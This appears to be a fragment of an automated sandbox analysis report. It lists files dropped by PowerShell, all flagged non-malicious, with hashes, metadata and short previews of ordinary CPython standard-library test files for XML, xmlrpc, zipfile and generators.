                                                                                                                                                                                                                      SHA1:1C0A80A4413859DEC4846905489C7046165AD0B6
                                                                                                                                                                                                                      SHA-256:209139765B9983A626D1E577F678D22054F7BDFAF5E09C6E0C197F93B3EE0E56
                                                                                                                                                                                                                      SHA-512:5C18FCDDDBD0E3125380E2A9CAF169D5068C6D31BC420BA155EFF92BE6C234957AC071761EACC648331B80B59923E1B915B9A18A07C261337F026ADF63A8A110
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# xml.etree test for cElementTree..import io..import struct..from test import support..from test.support.import_helper import import_fresh_module..import types..import unittest....cET = import_fresh_module('xml.etree.ElementTree',.. fresh=['_elementtree'])..cET_alias = import_fresh_module('xml.etree.cElementTree',.. fresh=['_elementtree', 'xml.etree'],.. deprecated=True)......@unittest.skipUnless(cET, 'requires _elementtree')..class MiscTests(unittest.TestCase):.. # Issue #8651... @support.bigmemtest(size=support._2G + 100, memuse=1, dry_run=False).. def test_length_overflow(self, size):.. data = b'x' * size.. parser = cET.XMLParser().. try:.. self.assertRaises(OverflowError, parser.feed, data).. finally:.. data = None.... def test_del_attribute(self):.. element = cET.Element('tag').... element.tag = 'TAG'.. with self.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):61007
                                                                                                                                                                                                                      Entropy (8bit):4.797923080264468
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:tzspX4omAlu7GIDhZRHvq1m7mVEZog8Ma:tz+4omAlui+3q8a/JMa
                                                                                                                                                                                                                      MD5:2424D0FFA7426F6C61C9A8E2BE957D7A
                                                                                                                                                                                                                      SHA1:B71ADA9D8CCF3B40CC9090B8ABBB1E00162FDEA7
                                                                                                                                                                                                                      SHA-256:755C135BC8C2DE0F8003D0B6D4089CACA34C907E57FA05E404D6CDC91C104302
                                                                                                                                                                                                                      SHA-512:512CE4885B0877859F2B454FFBB4338041FF2E59BC32197CD4E12FE2E7BF3A881F72E9A43511A80E803EEAFB3DCE28ECF1C383B0798D665220AEFA23F349AEF4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import base64..import datetime..import decimal..import sys..import time..import unittest..from unittest import mock..import xmlrpc.client as xmlrpclib..import xmlrpc.server..import http.client..import http, http.server..import socket..import threading..import re..import io..import contextlib..from test import support..from test.support import os_helper..from test.support import socket_helper..from test.support import threading_helper..from test.support import ALWAYS_EQ, LARGEST, SMALLEST....try:.. import gzip..except ImportError:.. gzip = None....support.requires_working_socket(module=True)....alist = [{'astring': 'foo@bar.baz.spam',.. 'afloat': 7283.43,.. 'anint': 2**20,.. 'ashortlong': 2,.. 'anotherlist': ['.zyx.41'],.. 'abase64': xmlrpclib.Binary(b"my dog has fleas"),.. 'b64bytes': b"my dog has fleas",.. 'b64bytearray': bytearray(b"my dog has fleas"),.. 'boolean': False,.. 'unicode': '\u4000\u6000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):985
                                                                                                                                                                                                                      Entropy (8bit):4.741552558870738
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:aZuOaPk+GbHDiwxk1FjIQEF7YF2r7ZP9pe:aZDL+sk1pIQ8YivA
                                                                                                                                                                                                                      MD5:CDBB76822A5AA816478B0D08FCF94AA0
                                                                                                                                                                                                                      SHA1:60815C60C25D15D8A3CDFFBA61648E38E14606E8
                                                                                                                                                                                                                      SHA-256:D4DE925A4A1A569FD61612CDCBD149876881B8EDEE7D34191483D80CB129A127
                                                                                                                                                                                                                      SHA-512:C23E1A593E7ED2CE758630C91C8D947A21253DCC26D762F365FB6375A614DB4D8EC1F576285BD1F1C522C9E19DDE200A9C6D1D1C43D66F08F4AAFD36B4336478
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import collections.abc..import unittest..from test import support....import xmlrpc.client as xmlrpclib......support.requires("network")......@unittest.skip('XXX: buildbot.python.org/all/xmlrpc/ is gone')..class PythonBuildersTest(unittest.TestCase):.... def test_python_builders(self):.. # Get the list of builders from the XMLRPC buildbot interface at.. # python.org... server = xmlrpclib.ServerProxy("http://buildbot.python.org/all/xmlrpc/").. try:.. builders = server.getAllBuilders().. except OSError as e:.. self.skipTest("network error: %s" % e).. self.addCleanup(lambda: server('close')()).... # Perform a minimal sanity check on the result, just to be sure.. # the request means what we think it means... self.assertIsInstance(builders, collections.abc.Sequence).. self.assertTrue([x for x in builders if "3.x" in x], builders)......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2611
                                                                                                                                                                                                                      Entropy (8bit):4.5888739071373275
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:FrnqvqaLILGLIX0Yq7/HqVt1pql5lVIqVJ1otFH6K:FrnELcCce/Hi1pQ5lVIm1otdX
                                                                                                                                                                                                                      MD5:890CA3688EDC5A06D6EDBBB94DB20E73
                                                                                                                                                                                                                      SHA1:00AEA67D1A92AD577DCC8ED3E3A08C7819F66231
                                                                                                                                                                                                                      SHA-256:8209708950A849A8AFDF4F5C9947B143514DE37A127BA50A5F2D438D46F4ED98
                                                                                                                                                                                                                      SHA-512:4AA228D47438C61445568D6831AB8A8582E0F35E2C9252890DF03C04C72692F85F59F04EF876944BE80DCD859D9EC79645200C0C987623596F1C2B84B7AC2CBA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from test.support import import_helper..import types....xxlimited = import_helper.import_module('xxlimited')..xxlimited_35 = import_helper.import_module('xxlimited_35')......class CommonTests:.. module: types.ModuleType.... def test_xxo_new(self):.. xxo = self.module.Xxo().... def test_xxo_attributes(self):.. xxo = self.module.Xxo().. with self.assertRaises(AttributeError):.. xxo.foo.. with self.assertRaises(AttributeError):.. del xxo.foo.... xxo.foo = 1234.. self.assertEqual(xxo.foo, 1234).... del xxo.foo.. with self.assertRaises(AttributeError):.. xxo.foo.... def test_foo(self):.. # the foo function adds 2 numbers.. self.assertEqual(self.module.foo(1, 2), 3).... def test_str(self):.. self.assertTrue(issubclass(self.module.Str, str)).. self.assertIsNot(self.module.Str, str).... custom_string = self.module.Str("abcd").. self.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):715
                                                                                                                                                                                                                      Entropy (8bit):4.727979028184191
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:URAFRpH6hJji91ye2Axf2kpjaRrFpwounaoubyoujouAouhyouIaouDouRj02pQ+:/r6jinnyHmyTy7IpyBrpVpQ+
                                                                                                                                                                                                                      MD5:A1950F4A0F4961882982A735F8A89261
                                                                                                                                                                                                                      SHA1:C1F2D1D51FD6E0A03C1EDFEF028B13B814F52A8E
                                                                                                                                                                                                                      SHA-256:724CB084529CB7DEA5EEEFB5EA7D68255537B6AD6E69B3A9F83C05428FAD1709
                                                                                                                                                                                                                      SHA-512:3A0F3BC24C342A43A0F5813043081ED00EE7DD9EA0BFFAA60E1D65AB76472B22E3D9E1D556283B628A1642F8412A0095A6B438F41CD8BCC898831EA7402D91C3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import faulthandler..from test.support import import_helper..import unittest...._xxtestfuzz = import_helper.import_module('_xxtestfuzz')......class TestFuzzer(unittest.TestCase):.. """To keep our https://github.com/google/oss-fuzz API working.""".... def test_sample_input_smoke_test(self):.. """This is only a regression test: Check that it doesn't crash.""".. _xxtestfuzz.run(b"").. _xxtestfuzz.run(b"\0").. _xxtestfuzz.run(b"{").. _xxtestfuzz.run(b" ").. _xxtestfuzz.run(b"x").. _xxtestfuzz.run(b"1").. _xxtestfuzz.run(b"AAAAAAA").. _xxtestfuzz.run(b"AAAAAA\0")......if __name__ == "__main__":.. faulthandler.enable().. unittest.main()..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):53013
                                                                                                                                                                                                                      Entropy (8bit):4.17416420275918
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:f1zkRoE1Hiiuz4aRh9S1avQ2i9A+xfT9Gj+Bf90fZjkKkctSt5/1HqfqLRvJYNfO:f1zduytStJ1HqfqLRvJYNfjqeB2
                                                                                                                                                                                                                      MD5:8FFDBB2534E1A834E69C9AD5C2FE573D
                                                                                                                                                                                                                      SHA1:05E9F25F4631EFA791351511834C9A5DBA0A9971
                                                                                                                                                                                                                      SHA-256:BEB4904854BAABDCB6FFB26EA26B14063D1F66094F9FA77169B4B782143FD081
                                                                                                                                                                                                                      SHA-512:76D5C3F96D2CCCE8B344338B74417858CE558E0E74090F6648C460D2186BD06C933BF93310854499BC0DAD014EE57BC3EBB567C8473839F4EDC157C7525A15AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-...."""..Test suite for PEP 380 implementation....adapted from original tests written by Greg Ewing..see <http://www.cosc.canterbury.ac.nz/greg.ewing/python/yield-from/YieldFrom-Python3.1.2-rev5.zip>.."""....import unittest..import inspect....from test.support import captured_stderr, disable_gc, gc_collect..from test import support....class TestPEP380Operation(unittest.TestCase):.. """.. Test semantics... """.... def test_delegation_of_initial_next_to_subgenerator(self):.. """.. Test delegation of initial next() call to subgenerator.. """.. trace = [].. def g1():.. trace.append("Starting g1").. yield from g2().. trace.append("Finishing g1").. def g2():.. trace.append("Starting g2").. yield 42.. trace.append("Finishing g2").. for x in g1():.. trace.append("Yielded %s" % (x,)).. self.assertEqual(trace,[.. "Start
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17423
                                                                                                                                                                                                                      Entropy (8bit):4.5964912667026345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:IikzD4BN5fI5/S2SpccSZKWzJxC02J3jYbXJQc3Q+WfUcyUcYvGSq7D3Z9Alep:Iik39N
                                                                                                                                                                                                                      MD5:10DF74D0EC43494B5DA7C179110CE954
                                                                                                                                                                                                                      SHA1:25F1BC5F5CF8E21690B2EED842C7FA1BF91D6F20
                                                                                                                                                                                                                      SHA-256:BEC009281A1220707ADB05FEA9EE4DF79A81B765329CC6D17FC4AD8487B79786
                                                                                                                                                                                                                      SHA-512:06EC1B253FCBC89A1EFE06D069A9D107A50809DBAF95F737987674F772ABBCDAF3DC3C178EC835E239C7FF4A0243079970389551AF737BEF3269B9E7797A736E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Test harness for the zipapp module."""....import io..import pathlib..import stat..import sys..import tempfile..import unittest..import zipapp..import zipfile..from test.support import requires_zlib..from test.support import os_helper....from unittest.mock import patch....class ZipAppTest(unittest.TestCase):.... """Test zipapp module functionality.""".... def setUp(self):.. tmpdir = tempfile.TemporaryDirectory().. self.addCleanup(tmpdir.cleanup).. self.tmpdir = pathlib.Path(tmpdir.name).... def test_create_archive(self):.. # Test packing a directory... source = self.tmpdir / 'source'.. source.mkdir().. (source / '__main__.py').touch().. target = self.tmpdir / 'source.pyz'.. zipapp.create_archive(str(source), str(target)).. self.assertTrue(target.is_file()).... def test_create_archive_with_pathlib(self):.. # Test packing a directory using Path objects for source and target... source = self.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6067
                                                                                                                                                                                                                      Entropy (8bit):4.69399238306175
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:V+KNPUfi7r5raB1G+6MghJqxme978e9ZoGdFt9TVWiTzbiinT5koA:V+nEBVppXqweyeTdtf3b5n6oA
                                                                                                                                                                                                                      MD5:65C48406EE9531FFFA8C5463CFD70F00
                                                                                                                                                                                                                      SHA1:E58B40BF18BF18A0116BF1C7486EA75ECE98C453
                                                                                                                                                                                                                      SHA-256:19BD1D5C959CA23F718E89D9F9D41A4132A9BCE2A36D6E67FC10F62DBAB360EF
                                                                                                                                                                                                                      SHA-512:4672A5FF9BA341C76076A8F9AF837D3F66183AAA0CDC2B6B900A7C8A4278C519C834F813B578746D01ACE2A1AE4BBF717222A9DA4B6737CA77E4222ABC41A8FD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tests of the full ZIP64 functionality of zipfile..# The support.requires call is the only reason for keeping this separate..# from test_zipfile..from test import support....# XXX(nnorwitz): disable this test by looking for extralargefile resource,..# which doesn't exist. This test takes over 30 minutes to run in general..# and requires more disk space than most of the buildbots...support.requires(.. 'extralargefile',.. 'test requires loads of disk-space bytes and a long time to run'.. )....import zipfile, unittest..import time..import sys....from tempfile import TemporaryFile....from test.support import os_helper..from test.support import requires_zlib....TESTFN = os_helper.TESTFN..TESTFN2 = TESTFN + "2"....# How much time in seconds can pass before we print a 'Still working' message..._PRINT_WORKING_MSG_INTERVAL = 60....class TestsWithSourceFile(unittest.TestCase):.. def setUp(self):.. # Create test data... line_gen = ("Test of zipfile line %d." %
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                                                                      Entropy (8bit):4.468107897022132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JSxQXTFRpWQVSRF8mo+vr3NZyWRjXC+g+zp+vr3crAwGfnJFU:aQDFRpXIF8twNZyAXlg6wIAa
                                                                                                                                                                                                                      MD5:C3239B95575B0AD63408B8E633F9334D
                                                                                                                                                                                                                      SHA1:7DBB42DFA3CA934FB86B8E0E2268B6B793CBCCDC
                                                                                                                                                                                                                      SHA-256:6546A8EF1019DA695EDECA7C68103A1A8E746D88B89FAF7D5297A60753FD1225
                                                                                                                                                                                                                      SHA-512:5685131AD55F43AB73AFCCBEF69652D03BB64E6135BEB476BC987F316AFE0198157507203B9846728BC7EA25BC88F040E7D2CB557C9480BAC72F519D6BA90B25
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import os..from test.support import load_package_tests....def load_tests(*args):.. return load_package_tests(os.path.dirname(__file__), *args)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):112
                                                                                                                                                                                                                      Entropy (8bit):4.411817987067579
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JShh9DZLYBmo6fxOZlwjjhAjpv/FPh6RNMy:C1L6t0xVFAjpH2My
                                                                                                                                                                                                                      MD5:E055AF7A21AD8C88FD6BD8ED26C1B854
                                                                                                                                                                                                                      SHA1:09F1ACF20F271AB8E2C7D82F08C8FA7B3F865CCB
                                                                                                                                                                                                                      SHA-256:A7B8ADFC028B454BECC239B42ABC346D1ABC219160A548EE25674A425C85987F
                                                                                                                                                                                                                      SHA-512:8151E07C01C4915999842AECAEAB8E815BD7094A52B5E10998307E1F3216E180CD5DECFCE11BEC950159554C6E51FA296A19E6AC199F9192F55F13A9A2444B4E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest....from . import load_tests # noqa: F401......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):220
                                                                                                                                                                                                                      Entropy (8bit):4.662717476935463
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JSmIVoawDF8X4MLdKdUWlFMeC80WMlY+zhS1ESVlxadGUlBdFo+55oE4Z2ov:vjamFtMJErtCNlYdbz4d6w4R
                                                                                                                                                                                                                      MD5:C932C97D3DE3CF97541C3BA3E632AD8F
                                                                                                                                                                                                                      SHA1:0EC12CE117F7D792681A9D4DC47502E41D121EF3
                                                                                                                                                                                                                      SHA-256:00871C58AB4C0C0389DC0D192EC583D8CA3DE5106D3292F1A79C880B603D1E9C
                                                                                                                                                                                                                      SHA-512:2FB1984D355663AE0AB74D02D01134A79EBF0DA0D959366752BBA2ECFEEC429EB998E6C6F01D9628A8DEBC9B85C4FF96D99ED207521A47CC66C07E31595274B6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import functools......# from jaraco.functools 3.5.2..def compose(*funcs):.. def compose_two(f1, f2):.. return lambda *args, **kwargs: f1(f2(*args, **kwargs)).... return functools.reduce(compose_two, funcs)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2169
                                                                                                                                                                                                                      Entropy (8bit):4.466629393210794
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:yY9uHhf3HBXlaTyhXlh9yKSvWjSKUolB9+XdIm:yYqJXLIyKJmELOm
                                                                                                                                                                                                                      MD5:CD300874CAFD6ACF398456B0B222096A
                                                                                                                                                                                                                      SHA1:5C49446DFFC94DAE442C7A1B89756C358D471BFA
                                                                                                                                                                                                                      SHA-256:190C323E170E46BA319902BB31FD02847CED2C148BBFF807B0C810843F9B0B31
                                                                                                                                                                                                                      SHA-512:AA03A0098A87D76AAAAF03A99457956763A2D9B50D36E47C456B912682F032855277DEF330C148CC29E66918C82352DC291037DB2173AF0B83FFCD0DF7FF1C9C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import itertools..from collections import deque..from itertools import islice......# from jaraco.itertools 6.3.0..class Counter:.. """.. Wrap an iterable in an object that stores the count of items.. that pass through it..... >>> items = Counter(range(20)).. >>> items.count.. 0.. >>> values = list(items).. >>> items.count.. 20.. """.... def __init__(self, i):.. self.count = 0.. self.iter = zip(itertools.count(1), i).... def __iter__(self):.. return self.... def __next__(self):.. self.count, result = next(self.iter).. return result......# from more_itertools v8.13.0..def always_iterable(obj, base_type=(str, bytes)):.. if obj is None:.. return iter(()).... if (base_type is not None) and isinstance(obj, base_type):.. return iter((obj,)).... try:.. return iter(obj).. except TypeError:.. return iter((obj,))......# from more_itertools v9.0.0..def consume(iterator, n=None):.. "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):228
                                                                                                                                                                                                                      Entropy (8bit):4.4400653811533
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:Lgd8XOeeoBnIijfMpLXaUmw3M0QPtoAoxyVKBHb:LW8XbeoBxjkRSw3D6oA+B7
                                                                                                                                                                                                                      MD5:6837C82C32A4B3D1EDABAB6C8F9EDAD7
                                                                                                                                                                                                                      SHA1:4AB8DBDCACCEBB35820338D244C4BC8F75223BDE
                                                                                                                                                                                                                      SHA-256:34FF942FA400306EA42D0ED607C5C9F76CB8C58C2E2E427A830EC0D5257A415E
                                                                                                                                                                                                                      SHA-512:6E2AD2873F072BD66B3AD0339012495F7FDDCC41A580D3BD9BDCB36F5204AE73F33929021E6754952C4079B5684DF222C7C34649377CC6470E7F047910E99BF4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import importlib..import unittest......def import_or_skip(name):.. try:.. return importlib.import_module(name).. except ImportError: # pragma: no cover.. raise unittest.SkipTest(f'Unable to import {name}')..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):944
                                                                                                                                                                                                                      Entropy (8bit):4.397653962347118
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:yDKPZP8N4NZek69jqhTS6ZKTI/NY4QzXGcEHgUb:yDKxUmek6OlKT0Qa7g6
                                                                                                                                                                                                                      MD5:09BA331E9B842F87C1A71AF9CE2966E0
                                                                                                                                                                                                                      SHA1:A92D335C421896E6E4B7C8AC8EDF66A5219FAB55
                                                                                                                                                                                                                      SHA-256:01F42E8D71AF8421B2A51AC7B878F485C9F058AA61D1F60B3F53EF7CF9234C79
                                                                                                                                                                                                                      SHA-512:18FED53D0B2A0E734B091A16F175FAB1571476D8F119E11C799B3ECAAC77A98E2BEEC1F61AE4C2298A430D74E1488588C1BD5971473B444A3691C72DD8575F54
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import types..import functools....from ._itertools import always_iterable......def parameterize(names, value_groups):.. """.. Decorate a test method to run it as a set of subtests..... Modeled after pytest.parametrize... """.... def decorator(func):.. @functools.wraps(func).. def wrapped(self):.. for values in value_groups:.. resolved = map(Invoked.eval, always_iterable(values)).. params = dict(zip(always_iterable(names), resolved)).. with self.subTest(**params):.. func(self, **params).... return wrapped.... return decorator......class Invoked(types.SimpleNamespace):.. """.. Wrap a function to be invoked for each usage... """.... @classmethod.. def wrap(cls, func):.. return cls(func=func).... @classmethod.. def eval(cls, cand):.. return cand.func() if isinstance(cand, cls) else cand..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3209
                                                                                                                                                                                                                      Entropy (8bit):4.58481065367164
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:StUunDufwSmILeULRYE8wPCs4Dd7WlBP8YEzA1eRAWeM:StUCKfnmpE8wqpDd7WlBkY6AwA+
                                                                                                                                                                                                                      MD5:EA9AEC28D07255AE3A1295DF9F12B075
                                                                                                                                                                                                                      SHA1:F6E1ECCE2D6CDB80CB75661FA554387E40365C5C
                                                                                                                                                                                                                      SHA-256:3AE87271C885D386CC5F7D6187D1C14C906B925CE2AF61483FA971BD78124CC6
                                                                                                                                                                                                                      SHA-512:2E9EDDF0E6EBBBFD7C8CCE5940E2E05B0D2A5F941F6318FF15ACBEA9AA6D6E409C067EEA0EB55AFB163A9170C1D8AF04B261555F7B02394D1FC28F39D2B5CEA0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import io..import itertools..import math..import re..import string..import unittest..import zipfile....from ._functools import compose..from ._itertools import consume....from ._support import import_or_skip......big_o = import_or_skip('big_o')..pytest = import_or_skip('pytest')......class TestComplexity(unittest.TestCase):.. @pytest.mark.flaky.. def test_implied_dirs_performance(self):.. best, others = big_o.big_o(.. compose(consume, zipfile.CompleteDirs._implied_dirs),.. lambda size: [.. '/'.join(string.ascii_lowercase + str(n)) for n in range(size).. ],.. max_n=1000,.. min_n=1,.. ).. assert best <= big_o.complexities.Linear.... def make_zip_path(self, depth=1, width=1) -> zipfile.Path:.. """.. Construct a Path with width files at every level of depth... """.. zf = zipfile.ZipFile(io.BytesIO(), mode='w').. pairs = itertools.product(self.make_deep_path
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19854
                                                                                                                                                                                                                      Entropy (8bit):4.638077922591941
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SmWbCSZtpw/aYt7IrBDZOc4mdZNb2ARkbRzRRh9R9DRSCkDWrEasiHm5Y3R50YDU:SmWbZ3VdDWrcKW418EQ
                                                                                                                                                                                                                      MD5:84F05D2F737A9304823A4D458E2AE83F
                                                                                                                                                                                                                      SHA1:A3CA6020B2BE16EA1AFE81D9C2495D10E5F9CBC0
                                                                                                                                                                                                                      SHA-256:E5E45B5B412FC169B5941988E666BF65D5A77A96EC8AB55D3D3C62A9911A0104
                                                                                                                                                                                                                      SHA-512:14DFE097471687202427C12490CADA37504079C1AF6B6B28119006E050E0EDECA8EF575D2CC6A39629FE9CA10D2BF33A256CB2F25199B111F8A449DEA1BCD509
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import io..import itertools..import contextlib..import pathlib..import pickle..import sys..import unittest..import zipfile....from ._functools import compose..from ._itertools import Counter....from ._test_params import parameterize, Invoked....from test.support.os_helper import temp_dir......class jaraco:.. class itertools:.. Counter = Counter......def add_dirs(zf):.. """.. Given a writable zip file zf, inject directory entries for.. any directories implied by the presence of children... """.. for name in zipfile.CompleteDirs._implied_dirs(zf.namelist()):.. zf.writestr(name, b"").. return zf......def build_alpharep_fixture():.. """.. Create a zip file with this structure:.... ... ... a.txt.. ... b.. . ... c.txt.. . ... d.. . . ... e.txt.. . ... f.txt.. ... g.. . ... h.. . ... i.txt.. ... j.. ... k.bin..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                                                                      Entropy (8bit):4.446566376084913
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1LYBUWR6eZ425EMY3WD5ZCQVLTShJ/Ry:1L6pV+2a5YXVLOb/A
                                                                                                                                                                                                                      MD5:724350389DF1B6ECC395D208F1020769
                                                                                                                                                                                                                      SHA1:DA8357794383094A113D90FBC671080638468FAC
                                                                                                                                                                                                                      SHA-256:1239E588970F95B8C43AAB287B2DB9D442C148250BAC220F8ADC7BEF21F4173A
                                                                                                                                                                                                                      SHA-512:FCAB67E577051E2E580DDE8907DA78541BB72AF6CFC7DAB410973274A7B0DB1C0EF075D6BB01023E1745A516A68F8DB438C135674807AB9A03C9D390BA216D6C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from . import test_path......__name__ == '__main__' and test_path.build_alpharep_fixture().extractall('alpharep')..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):144728
                                                                                                                                                                                                                      Entropy (8bit):4.753755036139217
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:xkm+pXw5Bb4wujg0lmGZjAmCOoTYJ5OkyImTY:xpBb4wujg0lmGZjAm/WGr
                                                                                                                                                                                                                      MD5:9C07AED1F6189C598F6E812B5FD2E429
                                                                                                                                                                                                                      SHA1:3592C29B0BC0F17ACD6505AEEF44114C5024DA3F
                                                                                                                                                                                                                      SHA-256:FAD0515D33B39A67A54F3D845BDB3D94EF9403BC585BF71B87C85FB9AA89B1AD
                                                                                                                                                                                                                      SHA-512:47F89E90C175871C868DE8BCBF88D6393928A923F70237ECD212F14D03CE7765FCD0A8D5D28504930ECA0020FF2A6B7B1B82CEF8FB639D4A1FB1D2076A8D79DA
                                                                                                                                                                                                                      Malicious:false
